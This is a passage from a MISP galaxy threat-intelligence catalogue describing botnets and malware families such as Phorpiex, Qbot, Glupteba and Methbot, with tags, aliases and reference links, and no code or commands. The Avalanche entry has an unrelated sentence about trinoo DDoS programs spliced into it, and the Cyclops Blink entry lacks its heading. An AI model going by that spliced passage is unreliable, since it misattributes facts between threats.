UPAS-Kit is also known as:

  • Rombrast

Table 755. Table References

Links

https://research.checkpoint.com/2018/deep-dive-upas-kit-vs-kronos/

https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html

https://web.archive.org/web/20130120062602/http://onthar.in/articles/upas-kit-analysis/

https://regmedia.co.uk/2019/04/19/plea.pdf

Phorpiex

Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:botnet="Phorpiex"

Phorpiex is also known as:

  • Trik

Table 756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

DDG

First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).

The tag is: misp-galaxy:botnet="DDG"

DDG has relationships with:

  • similar: misp-galaxy:malpedia="DDG" with estimative-language:likelihood-probability="likely"

Table 757. Table References

Links

https://twitter.com/JiaYu_521/status/1204248344043778048

https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/

https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/

https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/

https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/

https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg

Glupteba

A multi-component botnet targeting Windows Computer. Glupteba is known to steal user credentials and cookies, mine cryptocurrencies on infected hosts, deploy and operate proxy components targeting Windows systems and IoT devices. The botnet has been observed targeting victims worldwide, including the US, India, Brazil and Southeast Asia. The Glupteba malware family is primarily distributed through pay per install (PPI) networks and via traffic purchased from traffic distribution systems (TDS).

The tag is: misp-galaxy:botnet="Glupteba"

Table 758. Table References

Links

https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

Elknot

DDoS Botnet

The tag is: misp-galaxy:botnet="Elknot"

Elknot is also known as:

  • Linux/BillGates

  • BillGates

Table 759. Table References

Links

https://www.virusbulletin.com/conference/vb2016/abstracts/elknot-ddos-botnets-we-watched

https://www.virusbulletin.com/uploads/pdf/conference_slides/2016/Liu_Wang-vb-2016-TheElknotDDoSBotnetsWeWatched.pdf

Advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group.

The tag is: misp-galaxy:botnet="Cyclops Blink"

Table 760. Table References

Links

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

Abcbot

Botnet

The tag is: misp-galaxy:botnet="Abcbot"

Table 761. Table References

Links

https://blog.netlab.360.com/abcbot_an_evolving_botnet_en

Ripprbot

Botnet

The tag is: misp-galaxy:botnet="Ripprbot"

Table 762. Table References

Links

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days

EnemyBot

In mid-March [2022], FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.

This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.

It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.

Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported iRZ router vulnerability to infect more devices.

The tag is: misp-galaxy:botnet="EnemyBot"

EnemyBot has relationships with:

  • similar: misp-galaxy:malpedia="EnemyBot" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Gafgyt" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"

Table 763. Table References

Links

https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/

https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot

https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet

https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers

Qbot

Discovered in 2008 and under constant development, with gaps in operational use in the wild; operators are occasionally known as GOLD LAGOON. Banking Trojan, steals financial data, browser information/hooks, keystrokes, credentials; described by CheckPoint as a “Swiss Army knife”. Known to leverage many other tools; for example, PowerShell and Mimikatz are used for self-propagation. Attempts obfuscation via legitimate process injection. Known to serve as a dropper for ProLock ransomware. Infection vectors are common, with malspam as the most frequent. Active in 2020 – two big campaigns, one from March to June, second Starting in July and ongoing, as part of latest Emotet campaign. Newer version appeared in August.

The tag is: misp-galaxy:botnet="Qbot"

Qbot is also known as:

  • QakBot

  • Pinkslipbot

Qbot has relationships with:

  • dropped: misp-galaxy:ransomware="ProLock" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:ransomware="BlackBasta" with estimative-language:likelihood-probability="likely"

Table 764. Table References

Links

https://www.cisa.gov/sites/default/files/publications/202010221030_QakBot%20TLPWHITE.pdf

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

Dark.IoT

This malware is characterized by alternative DNS connections and connects to several *.lib domains using custom DNS servers.

The tag is: misp-galaxy:botnet="Dark.IoT"

Dark.IoT has relationships with:

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

Table 765. Table References

Links

https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/

KmsdBot

Akamai Security Research has observed a new golang malware which they named KmsdBot. The malware scans for open SSH ports and performs a simple dictionary attack against it. The researchers from Akamai monitored only DDoS activity, but discovered also the functionality to launch cryptomining. The malware has varied targets including the gaming industry, technology industry, and luxury car manufacturers.

The tag is: misp-galaxy:botnet="KmsdBot"

Table 766. Table References

Links

https://www.akamai.com/blog/security-research/kmdsbot-the-attack-and-mine-malware

HinataBot

Akamai researchers on the Security Intelligence Response Team (SIRT) have discovered a new Go-based, DDoS-focused botnet. The malware appears to have been named “Hinata” by the malware author after a character from the popular anime series, Naruto. We are calling it “HinataBot.” Looks like an attempt to rewrite Mirai in Go. The threat actors behind HinataBot originally distributed Mirai binaries.

The tag is: misp-galaxy:botnet="HinataBot"

HinataBot has relationships with:

  • similar: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

Table 767. Table References

Links

https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet

https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot

3ve

3ve, pronounced as “Eve”, was a botnet that was halted in late 2018. 3ve utilized the malware packages Boaxxe and Kovter to infect a network of PCs. They were spread through emails and fake downloads, and once infected, the bots would generate fake clicks on online advertisements. The clicks would be used on fake websites, which hosted ads and then absorbed the ad revenue from the false impressions. Bots were able to mimic desktop and mobile traffic in order to evade detection, and went through several evolutions of tactics to grow over time. At its peak, the botnet controlled more than one million residential and corporate IP-addresses, largely within Europe and North America.

The tag is: misp-galaxy:botnet="3ve"

Table 768. Table References

Links

https://en.wikipedia.org/wiki/3ve

7777-Botnet

7777-Botnet has been observed brute forcing Microsoft Azure instances via Microsoft Azure PowerShell bruteforcing. The botnet has a unique pattern of opening port 7777 on infected devices, returning an “xlogin:” message. The botnet has been used for low-volume attacks against targets of all industry sectors at a global scale, almost exclusively targeting C-Level employee logins. Due to the very low volume of around 2–3 login requests per week, the botnet is able to evade most security solutions.

The tag is: misp-galaxy:botnet="7777-Botnet"

Table 769. Table References

Links

https://gi7w0rm.medium.com/the-curious-case-of-the-7777-botnet-86e3464c3ffd

Amadey

Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called tasks) for all or specifically targeted computers compromised by the malware.

The tag is: misp-galaxy:botnet="Amadey"

Table 770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AndroidBauts

AndroidBauts botnet is a network of infected Android devices that are used for promoting advertisements to users online. At one point, the number of infected devices was more than 550,000. The creators of the AndroidBauts botnet are able to gather data regarding the compromised devices - both software and hardware.

The tag is: misp-galaxy:botnet="AndroidBauts"

Table 771. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/Steckbriefe/Bauts/AndroidBauts.html

Andromeda

Andromeda botnet, also known as Gamarue or Wauchos, was first introduced to the public in 2011. During this time it was used to distribute large quantities of malware. According to Microsoft the Andromeda botnet was used to spread more than 80 malware families including ransomware, worms, and more. Andromeda is a modular malware, meaning additional components can be purchased to provide extra functionality.

The tag is: misp-galaxy:botnet="Andromeda"

Andromeda is also known as:

  • Gamarue

  • Wauchos

Table 772. Table References

Links

https://blogs.blackberry.com/en/2020/05/threat-spotlight-andromeda

https://en.wikipedia.org/wiki/Andromeda_(trojan)

ArrkiiSDK

ArrkiiSDK is potentially unwanted application (PUA) for Android devices. Its functions include unauthorised user tracking, ad fraud and the silent installation of additional applications without the user’s permission. ArrkiiSDK relies on the user actively installing an infected application, which is normally hidden within another software package that appears completely harmless.

The tag is: misp-galaxy:botnet="ArrkiiSDK"

Table 773. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Avalanche

Avalanche refers to a large global network hosting infrastructure used by cyber criminals to conduct phishing and malware distribution campaigns and money mule schemes. is a set of computer programs to conduct a DDoS attack. It is believed that trinoo networks have been set up on thousands of systems on the Internet that have been compromised by remote buffer overrun exploits. Cyber criminals utilized Avalanche botnet infrastructure to host and distribute a variety of malware variants to victims, including the targeting of over 40 major financial institutions. Victims may have had their sensitive personal information stolen (e.g., user account credentials). Victims’ compromised systems may also have been used to conduct other malicious activity, such as launching denial-of-service (DoS) attacks or distributing malware variants to other victims’ computers. In addition, Avalanche infrastructure was used to run money mule schemes where criminals recruited people to commit fraud involving transporting and laundering stolen money or merchandise. Avalanche used fast-flux DNS, a technique to hide the criminal servers, behind a constantly changing network of compromised systems acting as proxies.

The tag is: misp-galaxy:botnet="Avalanche"

Table 774. Table References

Links

https://www.cisa.gov/news-events/alerts/2016/12/01/avalanche-crimeware-service-infrastructure

Bayrob

Bayrob evolved from a backdoor trojan used for fraud into a cryptocurrency miner. Symantec discovered multiple versions of Bayrob malware, and witnessed Bayrob as it morphed from online fraud to a 300,000+ botnet for cryptocurrency mining.

The tag is: misp-galaxy:botnet="Bayrob"

Table 775. Table References

Links

https://www.bleepingcomputer.com/news/security/bayrob-malware-gang-had-elite-tactics-but-they-still-got-caught-anyway/

https://community.broadcom.com/symantecenterprise/viewdocument/bayrob-three-suspects-extradited-t?CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Bedep

Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.

The tag is: misp-galaxy:botnet="Bedep"

Table 776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep

Bolek

Bolek is a malware from the Kbot/Carberp family. It is being subject to frequent updates and has malicious capabilities which include self-spreading through USB and network shares, TOR network access, screen captures and web injects, and uses asymmetric cryptography to secure network communications.

The tag is: misp-galaxy:botnet="Bolek"

Bolek has relationships with:

  • similar: misp-galaxy:botnet="KBOT" with estimative-language:likelihood-probability="likely"

Table 777. Table References

Links

https://www.bitsight.com/blog/bolek-an-evolving-botnet-targets-poland-and-ukraine

Carna

The Carna botnet was a botnet of 420,000 devices created by an anonymous hacker to measure the extent of the Internet. The data was collected by infiltrating Internet devices, especially routers, that used a default password or no password at all.

The tag is: misp-galaxy:botnet="Carna"

Table 778. Table References

Links

https://en.wikipedia.org/wiki/Carna_botnet

Code Shikara

Code Shikara is a computer worm, related to the Dorkbot family, that attacks through social engineering and capable of spying on users' browsing activities, meanwhile stealing their personal online/offline information and/or credentials.

The tag is: misp-galaxy:botnet="Code Shikara"

Table 779. Table References

Links

https://en.wikipedia.org/wiki/Code_Shikara

Condi

DDoS-as-a-service botnet calling itself Condi. This malware employs several techniques to keep itself running in an infected system. At the same time, it also prevents infections from other botnets by attempting to terminate their processes. Typical to Mirai-based botnets, this malware cannot survive a system reboot.

The tag is: misp-galaxy:botnet="Condi"

Table 780. Table References

Links

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Cooee

Cooee is a trojan pre-installed on some Phillips smartphones that displays annoying advertisements and downloads and installs different software without user knowledge.

The tag is: misp-galaxy:botnet="Cooee"

Table 781. Table References

Links

https://news.softpedia.com/news/trojan-found-preinstalled-on-the-firmware-of-some-phillips-s307-android-smartphones-499177.shtml

Coreflood

Coreflood is a trojan horse and botnet created by a group of Russian hackers and released in 2010. The FBI included on its list of infected systems approximately 17 state or local government agencies, including one police department; three airports; two defense contractors; five banks or financial institutions; approximately 30 colleges or universities; approximately 20 hospital or health care companies; and hundreds of businesses. It is present on more than 2.3 million computers worldwide and as of May 2011 remains a threat.

The tag is: misp-galaxy:botnet="Coreflood"

Table 782. Table References

Links

https://en.wikipedia.org/wiki/Coreflood

Crackonosh

In 2021 Crackonosh has been found in 222,000 compromised computers that were used to download illegal, torrented versions of popular video games. Crackonosh successfully operated for years because it had built-in mechanisms to disable security software and updates, which made it difficult for users to detect and remove the program. The malware is thought to have originated in the Czech Republic, but it had a global reach.

The tag is: misp-galaxy:botnet="Crackonosh"

Table 783. Table References

Links

https://finance.yahoo.com/news/monero-mining-malware-crackonosh-infected-192448133.html

FluBot

FluBot is a remote control and info stealer malware. It has abilities to read and send SMS message, delete app, and execute arbitrary commands. It is often distributed through SMS messages. PRODAFT describes FluBot as a banking malware which originally targeted Spain. Since the first quarter of 2021 it has been targeting many other European countries as well as Japan. It uses a DGA for it’s C&C and relies on both DNS and DNS-over-HTTPS for name resolution. Despite arrests of multiple people suspected of involvement with this malware in March of 2021, the campaign has only intensified since.

The tag is: misp-galaxy:botnet="FluBot"

FluBot is also known as:

  • Cabassous

  • FakeChat

Table 784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/apk.flubot

FritzFrog

FritzFrog is a decentralized botnet that uses P2P protocols to distribute control over all of its nodes, thereby avoiding having one controller or single point of failure.

The tag is: misp-galaxy:botnet="FritzFrog"

Table 785. Table References

Links

https://en.wikipedia.org/wiki/FritzFrog

Gootkit

Gootkit is a trojan that steals confidential information and allows criminals to take control of infected systems remotely. Gootkit can also be used to install additional malware, such as Emotet. This botnet is a type of malware bot that may perform many malicious tasks, such as downloading and executing additional malware, receiving commands from a control server and relaying specific information and telemetry back to the control server, updating or deleting itself, stealing login and password information, logging keystrokes, participating in a Distributed Denial of Service (DDoS) attack, or locking and encrypting the contents of your computer and demanding payment for its safe return.

The tag is: misp-galaxy:botnet="Gootkit"

Table 786. Table References

Links

https://www.fortiguard.com/encyclopedia/botnet/7630462

Great Cannon

The Great Cannon of China is an Internet attack tool that is used by the Chinese government to launch distributed denial-of-service attacks on websites by performing a man-in-the-middle attack on large amounts of web traffic and injecting code which causes the end-user’s web browsers to flood traffic to targeted websites.[1] According to the researchers at the Citizen Lab, the International Computer Science Institute, and Princeton University’s Center for Information Technology Policy, who coined the term, the Great Cannon hijacks foreign web traffic intended for Chinese websites and re-purposes them to flood targeted web servers with enormous amounts of traffic in an attempt to disrupt their operations.

The tag is: misp-galaxy:botnet="Great Cannon"

Table 787. Table References

Links

https://en.wikipedia.org/wiki/Great_Cannon

Hail Mary Cloud

The Hail Mary Cloud was, or is, a password guessing botnet, which used a statistical equivalent to brute force password guessing. The botnet ran from possibly as early as 2005, and certainly from 2007 until 2012 and possibly later. The botnet was named and documented by Peter N. M. Hansteen. The principle is that a botnet can try several thousands of more likely passwords against thousands of hosts, rather than millions of passwords against one host. Since the attacks were widely distributed, the frequency on a given server was low and was unlikely to trigger alarms. Moreover, the attacks come from different members of the botnet, thus decreasing the effectiveness of both IP based detection and blocking.

The tag is: misp-galaxy:botnet="Hail Mary Cloud"

Table 788. Table References

Links

https://en.wikipedia.org/wiki/Hail_Mary_Cloud

Joker

Joker is a trojan that is included in several unsuspecting apps that have been offered via the Google Play Store, among others. The malware silently interacts with ad networks to perform clicks on ad banners and subscribe to paid premium services. To do this, Joker is able to read SMS messages, contact lists and device information from the victim system. It collects data from infected systems, intercepts sensitive communications and transmits the information to a remote attacker.

The tag is: misp-galaxy:botnet="Joker"

Table 789. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/Steckbriefe/Joker/Joker.html

KBOT

KBOT penetrates users’ computers via the Internet or a local network, or from infected external media. After the infected file is launched, the malware gains a foothold in the system, writing itself to Startup and the Task Scheduler, and then deploys web injects to try to steal the victim’s bank and personal data. For the same purpose, KBOT can download additional stealer modules that harvest and send to the C&C server almost full information about the user: passwords/logins, cryptowallet data, lists of files and installed applications, and so on.

The tag is: misp-galaxy:botnet="KBOT"

Table 790. Table References

Links

https://securelist.com/kbot-sometimes-they-come-back/96157/

https://cofense.com/blog/bolek-leaked-carberp-kbot-source-code-complicit-new-phishing-campaigns/

Linux.Darlloz

Linux.Darlloz is a worm which infects Linux embedded systems. Linux.Darlloz was first discovered by Symantec in 2013.[3] Linux.Darlloz targets the Internet of things and infects routers, security cameras, set-top boxes by exploiting a PHP vulnerability. The worm was based on a Proof of concept code that was released in October 2013. inux.Darlloz utilizes vulnerability (CVE-2012-1823) to exploit systems in order to compromise systems. Linux.Darlloz was later found in March 2014 to have started mining crypto currencies such as Mincoin and Dogecoin. Linux.Aidra, the malware that Linux.Darlloz attempts usurp - like some of the variants of Darlloz, Linux.Aidra targets smaller devices, specifically cable and DSL modems. The worm adds them to a botnet, which can be utilized by the attackers to perform DDoS attacks.

The tag is: misp-galaxy:botnet="Linux.Darlloz"

Table 791. Table References

Links

https://en.wikipedia.org/wiki/Linux.Darlloz

https://www.wired.com/2014/01/spime-watch-linux-darlloz-internet-things-worm/

Marcher

Marcher is a banking trojan for Android devices. Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards. Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.

The tag is: misp-galaxy:botnet="Marcher"

Table 792. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://www.securityweek.com/thousands-android-devices-infected-marcher-trojan/

Matsnu

Matsnu is a malware downloader. The malware downloaded may include the banking trojans Citadel and URLZone/Bebloh. Matsnu can also be expanded with additional functions using plug-ins. One of these plug-ins is designed to capture access data for e-mail accounts and FTP programs and pass this information to the operator of the malware.

The tag is: misp-galaxy:botnet="Matsnu"

Table 793. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://threatpost.com/matsnu-botnet-dga-discovers-power-of-words/109426/

Methbot

Methbot was an advertising fraud scheme. Methbot was first tracked in 2015 by cybersecurity firm White Ops, and the botnet saw rapidly increased activity in 2016. The botnet originated in Russia (though it was not state sponsored), and utilized foreign computers and networks in Europe and North America. The infrastructure consisted of 571,904 dedicated IPs, 6,000 domains, and 250,267 distinct URLs, each of which could only house a video ad, and used variants of the names of famous publishers to fool those looking into the domains. This led the operators to game the system, leading ad selection algorithms to select these fake web pages over larger corporate pages from legitimate companies, and charge advertisers at a premium. About 570,000 bots were used to execute clicks on those websites, “watching” up to 300 million video ads a day while the bots mimicked normal computer user behavior. Estimated clicks per day generally reached between 200 and 300 million per day. The botnet relied on data servers instead of more traditional botnets that rely on infected PCs and mobile devices.

The tag is: misp-galaxy:botnet="Methbot"

Table 794. Table References

Links

https://en.wikipedia.org/wiki/Methbot

Metulji

The Metulji botnet, discovered in June 2011, is a botnet mainly involved in cyberscamming and denial of service attacks. Before the botnet itself was dismantled, it consisted of over 12 million individual zombie computers infected with the Butterfly Bot, making it, as of June 2011, the largest known botnet. It is not known what type of computers are vulnerable, or how to tell if a computer is a part of this botnet.

The tag is: misp-galaxy:botnet="Metulji"

Table 795. Table References

Links

https://en.wikipedia.org/wiki/Metulji_botnet

Mevade

The Mevade Botnet, also known as Sefnit or SBC, is a massive botnet. Its operators are unknown and its motives seems to be multi-purpose. In late 2013 the Tor anonymity network saw a very sudden and significant increase in users, from 800,000 daily to more than 5,000,000. A botnet was suspected and fingers pointed at Mevade. Trend Micro reported that its Smart Protection Network saw a tor module being distributed to Mevade Trojans.

The tag is: misp-galaxy:botnet="Mevade"

Mevade is also known as:

  • Sefnit

  • SBC

Table 796. Table References

Links

https://en.wikipedia.org/wiki/Mevade_Botnet

MobiDash

MobiDash is a piece of adware for Android devices. The user is shown advertisements without their consent. Mobidash can also make calls in the background.

The tag is: misp-galaxy:botnet="MobiDash"

Table 797. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Mutabaha

Mutabaha is a Trojan for Windows devices. Outfire, a Chromium-based browser, is downloaded and installed. This pretends to be the version of the Google Chrome browser. Mutabaha is able to drain data and manipulate advertisements. Mutabaha is downloaded and installed by another malware. As a rule, this dropper is removed after the malware has been installed, making it almost impossible to trace the infection.

The tag is: misp-galaxy:botnet="Mutabaha"

Table 798. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

MyDoom

MyDoom is a malicious program that opens a backdoor to the infected device. Through this backdoor the attacker can gain access to the system and carry out further actions. The attack possibilities are diverse and range from information theft to the reloading of additional malware. MyDoom adds infected computers to a botnet and then carries out distributed denial of service (DDoS) attacks. When the worm takes control over the victim’s OS, it then opens various ports and provides a backdoor to invite even more malware in.

The tag is: misp-galaxy:botnet="MyDoom"

Table 799. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

https://nordvpn.com/blog/mydoom-virus/

Necurs

The Necurs botnet is a distributor of many pieces of malware, most notably Locky. Around June 1, 2016, the botnet went offline, perhaps due to a glitch in the command and control server running Necurs. However, three weeks later, Jon French from AppRiver discovered a spike in spam emails, signifying either a temporary spike in the botnet’s activity or return to its normal pre-June 1 state. In a 2020 report, it was noted to have particularly targeted India, Southeast Asia, Turkey and Mexico.

The tag is: misp-galaxy:botnet="Necurs"

Table 800. Table References

Links

https://en.wikipedia.org/wiki/Necurs_botnet

Nitol

The Nitol botnet mostly involved in spreading malware and distributed denial-of-service attacks. The Nitol Botnet was first discovered around December 2012, with analysis of the botnet indicating that the botnet is mostly prevalent in China where an estimate 85% of the infections are detected. In China the botnet was found to be present on systems that came brand-new from the factory, indicating the trojan was installed somewhere during the assembly and manufacturing process. According to Microsoft the systems at risk also contained a counterfeit installation of Microsoft Windows. On 10 September 2012 Microsoft took action against the Nitol Botnet by obtaining a court order and subsequently sinkholing the 3322.org domain. The 3322.org domain is a Dynamic DNS which was used by the botnet creators as a command and control infrastructure for controlling their botnet. Microsoft later settled with 3322.org operator Pen Yong, which allowed the latter to continue operating the domain on the condition that any subdomains linked to malware remain sinkholed.

The tag is: misp-galaxy:botnet="Nitol"

Table 801. Table References

Links

https://en.wikipedia.org/wiki/Nitol_botnet

Nymaim

Nymaim was discovered in 2013. At that time it was only a dropper used to distribute TorrentLocker. In February 2016 it became popular again after incorporating leaked ISFB code, dubbed Goznym. When dropper obtains C&C address, it starts real communication. It downloads two important binaries and a lot more: payload – banker module (responsible for web injects – passive member of botnet); optional bot module (it is trying to open ports on a router and become an active part of a botnet. When it fails to do so, it removes itself from a system).

The tag is: misp-galaxy:botnet="Nymaim"

Table 802. Table References

Links

https://cert.pl/en/posts/2017/01/nymaim-revisited/

PBot

PBot is a P2P botnet derived from the Mirai source code. PBot performs MITB (man-in-the-browser) attacks and injects various scripts into legitimate websites. Its capabilities may go beyond simple injections of ads, depending on the intentions of its distributors.

The tag is: misp-galaxy:botnet="PBot"

PBot is also known as:

  • PythonBot

Table 803. Table References

Links

https://www.malwarebytes.com/blog/news/2018/04/pbot-python-based-adware

https://malpedia.caad.fkie.fraunhofer.de/details/elf.pbot

https://www.bitdefender.com/blog/businessinsights/ddos-attacks-increase-28-as-pbot-authors-use-decades-old-php-code/

Pirrit

Pirrit is a potentially unwanted application (PUA) for Windows and MacOS devices. It displays additional pop-ups and advertisements when the device is used. Pirrit downloads other malicious programs from a server and runs these programs; it can also manipulate system files.

The tag is: misp-galaxy:botnet="Pirrit"

Table 804. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pitou

Pitou is a trojan for Windows devices. Its functions are to steal passwords and collect various pieces of information about the mobile phone, such as its location and contacts.

The tag is: misp-galaxy:botnet="Pitou"

Table 805. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Prometei

Prometei is a cryptocurrency-mining botnet. Despite their activities being visible in logs, some botnets successfully fly under detection teams' radar, possibly due to their small size or constant development on the adversary’s part. Prometei is just one of these types of networks that focuses on Monero mining.

The tag is: misp-galaxy:botnet="Prometei"

Table 806. Table References

Links

https://blog.talosintelligence.com/prometei-botnet-and-its-quest-for-monero/

PrizeRAT

PrizeRAT is a trojan for Android devices. Its functions include unauthorised user tracking, stealing passwords and the silent installation of additional applications without the user’s permission. As the malware is part of the firmware of the device, it is not generally recognised by anti-virus solutions for Android. The risk affects a limited group of mobile end devices made by Chinese manufacturers for the low-price segment.

The tag is: misp-galaxy:botnet="PrizeRAT"

Table 807. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pushlran

Pushlran is a potentially unwanted application (PUA) for Android devices. It displays additional pop-ups and advertisements when the device is used. The app collects data from infected systems, intercepts sensitive communication and passes this information to a remote attacker.

The tag is: misp-galaxy:botnet="Pushlran"

Table 808. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Pykspa

Pykspa is a piece of malware that can be used to remotely control infected systems. It also enables attackers to download other malware or extract personal data. There are a number of versions of this malware and it has been developed over a long period of time. Some of the most recent versions of Pykspa are able to deactivate security systems such as anti-virus programs.

The tag is: misp-galaxy:botnet="Pykspa"

Table 809. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Qsnatch

Qsnatch is a trojan for Linux devices that primarily attacks network drives manufactured by QNAP. Its functions include stealing access data and opening backdoors to infected devices. Through this backdoor, the attacker can gain access to the system and perform other actions. The malware is capable of a wide range of attack types, from information theft to downloading other malware.

The tag is: misp-galaxy:botnet="Qsnatch"

Table 810. Table References

Links

https://www.bsi.bund.de/EN/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Botnetze/Steckbriefe-aktueller-Botnetze/steckbriefe-aktueller-botnetze.html

Remaiten

Remaiten is malware which infects Linux on embedded systems by brute forcing using frequently used default username and passwords combinations from a list in order to infect a system. Remaiten combines the features of the Tsunami and LizardStresser (aka Torlus) malware families. The command and control for Remaiten are handled by IRC communications. Additionally the command and control is done by an actual IRC channel rather than only the IRC protocol. This is an improvement over bots such as Tsunami and Torlus making Remaiten a greater threat than both combined. To avoid detection, Remaiten tries to determine the platform of a device to download the architecture-appropriate component from the command & control server. Once Remaiten infects a device it is able to perform actions such as launching distributed denial of service attacks or download more malware on a device.[5] Remaiten is able to scan and remove competing bots on a system compromised by it.

The tag is: misp-galaxy:botnet="Remaiten"

Table 811. Table References

Links

